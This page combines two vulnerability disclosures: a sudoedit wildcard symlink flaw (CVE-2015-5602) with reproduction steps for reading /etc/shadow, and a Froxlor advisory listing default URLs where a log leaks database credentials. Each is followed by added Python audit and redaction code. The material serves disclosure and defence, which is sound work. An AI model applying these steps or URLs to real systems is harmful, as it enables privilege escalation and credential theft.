# Exploit Title: sudo -e - a.k.a. sudoedit -  unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.

Hello,

I found a security bug in sudo (checked in the latest versions of sudo
running on RHEL and ubuntu) when a user is granted with root access to
modify a particular file that could be located in a subset of directories.

It seems that sudoedit does not check the full path if a wildcard is used
twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
file.txt real file with a symbolic link to a different location (e.g.
/etc/shadow).

I was able to perform such redirect and retrieve the data from the
/etc/shadow file.

In order for you to replicate this, you should configure the following line
in your /etc/sudoers file:

<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

Then, logged as that user, create a subdirectory within its home folder
(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
inside the new folder named test.txt pointing to /etc/shadow.

When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
be allowed to access /etc/shadow even if you have not been granted
such access in the sudoers file.

I checked this against fixed directories and files (not using a wildcard)
and it does work with symbolic links created under the /home folder.
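Two defensive checks that follow from the report, as an added Python example (not part of the sudo project or of the report): an audit that flags sudoers rules whose sudoedit path has a wildcard in a directory component (a user who controls any directory matched by '*' can plant a symlink there under the expected file name), and a policy check that re-matches the pattern against the symlink-resolved path, which rejects the /etc/shadow redirect described above. The sudoers excerpt and the directory tree are constructed in a temporary directory, and the path matcher never lets a wildcard cross a '/', as sudoers(5) documents for path names.

```python
import fnmatch
import os
import tempfile

# Constructed sudoers excerpt mirroring the report (user names are placeholders).
SAMPLE_SUDOERS = """
Defaults env_reset
alice ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
bob   ALL=(root) sudoedit /etc/hosts
"""


def sudoedit_rules(sudoers_text):
    """Very small sudoers reader: (user, path_pattern) for every sudoedit command.
    Hypothetical helper: it ignores aliases, host lists and continuation lines."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "sudoedit" not in line:
            continue
        user = line.split()[0]
        paths = line.split("sudoedit", 1)[1].split()
        rules.extend((user, path.rstrip(",")) for path in paths)
    return rules


def risky_rules(rules):
    """Flag patterns with a wildcard in a directory component: the user may own a
    directory that '*' matches and can place a symlink there named like the last component."""
    flagged = []
    for user, pattern in rules:
        directory = pattern.rsplit("/", 1)[0]
        if any(ch in directory for ch in "*?["):
            flagged.append((user, pattern))
    return flagged


def match_path(path, pattern):
    """fnmatch(3)-with-FNM_PATHNAME semantics: a wildcard never matches across a '/'."""
    path_parts, pattern_parts = path.split("/"), pattern.split("/")
    return len(path_parts) == len(pattern_parts) and all(
        fnmatch.fnmatchcase(a, b) for a, b in zip(path_parts, pattern_parts))


def path_allowed(requested, pattern):
    """The request must match the rule both as typed and after resolving symlinks;
    a symlink that points at /etc/shadow fails the second check."""
    if not match_path(requested, pattern):
        return False
    return match_path(os.path.realpath(requested), pattern)


def build_demo_tree():
    """Constructed layout under a temp dir: a protected file, a legitimate test.txt, and a
    symlink named test.txt in a user-created directory pointing at the protected file."""
    base = os.path.realpath(tempfile.mkdtemp())
    os.makedirs(os.path.join(base, "home", "alice", "docs"))
    os.makedirs(os.path.join(base, "home", "alice", "newdir"))
    os.makedirs(os.path.join(base, "etc"))
    protected = os.path.join(base, "etc", "shadow")
    with open(protected, "w") as fh:
        fh.write("root:*:16000:0:99999:7:::\n")  # constructed placeholder content
    with open(os.path.join(base, "home", "alice", "docs", "test.txt"), "w") as fh:
        fh.write("notes\n")
    os.symlink(protected, os.path.join(base, "home", "alice", "newdir", "test.txt"))
    return base
```

Running `risky_rules(sudoedit_rules(open("/etc/sudoers").read()))` over a real policy is the audit step; `path_allowed` is the check an editor wrapper should make before it opens anything with elevated privileges, and it is the part the report shows sudoedit was missing for the wildcard case.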



Froxlor - information leak

Affects
=====
- Froxlor 0.9.33.1 and earlier

Fixed
====
- Froxlor 0.9.33.2

Summary
========
An unauthenticated remote attacker is able to get the database password via webaccess due to wrong file permissions of the /logs/ folder in froxlor version 0.9.33.1 and earlier. The plain SQL password and username may be stored in the /logs/sql-error.log file. This directory is publicly reachable under the default configuration/setup.
Notes
=====
Some default URLs are:
http://website.tld/froxlor/logs/sql-error.log
http://cp.website.tld/logs/sql-error.log
http://froxlor.website.tld/logs/sql-error.log

The relevant section looks like this:

/var/www/froxlor/lib/classes/database/class.Database.php(279): PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'PLAIN_DATABASE_PW', Array)
Please note that the password in the logfile is truncated to 15 chars, therefore passwords longer than 15 chars are not fully visible to an attacker.
Patches
======
- log db errors to syslog instead of /logs/sql-error.log file:

https://github.com/Froxlor/Froxlor/commit/4ec376b29671593a50556630551e04e34bc83c1c
- replace passwords even before logging:

https://github.com/Froxlor/Froxlor/commit/8558533a9148a2a0302c9c177abff8e4e4075b92
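The two Froxlor patches cited above are a log relocation and a pre-logging redaction. As an added Python illustration (not Froxlor code), here are both in a form that applies to any PHP-style stack trace: mask the credential arguments of PDO::__construct, scrub configured secrets before a line is written, and verify that the log path does not resolve inside the document root. The trace line, credentials and paths are constructed samples.

```python
import os
import re

# Constructed log line in the shape quoted in the advisory; credentials are sample values.
SAMPLE_TRACE = ("#0 /var/www/froxlor/lib/classes/database/class.Database.php(279): "
                "PDO->__construct('mysql:host=127.0.0.1;dbname=froxlor', 'fx_admin', "
                "'Tr0ub4dor&3', Array)")

# Captures the DSN (kept: it has no secret), then the user and password arguments.
PDO_CTOR = re.compile(r"(PDO->__construct\('[^']*',\s*')([^']*)(',\s*')([^']*)(')")


def redact_pdo_args(line):
    """Mask the username and password arguments of PDO::__construct in a stack trace."""
    return PDO_CTOR.sub(lambda m: f"{m.group(1)}***{m.group(3)}***{m.group(5)}", line)


def redact_known_secrets(line, secrets):
    """Scrub configured credentials wherever they appear; longest first so a secret that
    is a prefix of another cannot leave a tail behind."""
    for secret in sorted(secrets, key=len, reverse=True):
        if secret:
            line = line.replace(secret, "***")
    return line


def safe_log_line(line, secrets=()):
    """What should reach the log file: pattern-based masking plus known-secret scrubbing."""
    return redact_known_secrets(redact_pdo_args(line), secrets)


def log_path_is_web_exposed(log_path, document_root):
    """True if the log file resolves inside the web server's document root."""
    real_log = os.path.realpath(log_path)
    real_root = os.path.realpath(document_root).rstrip(os.sep)
    return real_log == real_root or real_log.startswith(real_root + os.sep)
```

The pattern-based mask catches the trace the advisory quotes; the known-secret scrub is the second line of defence for traces that format arguments differently (the page itself notes the logged password was truncated to 15 characters, so scrubbing must also be applied to the truncated form if a logger cuts arguments).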


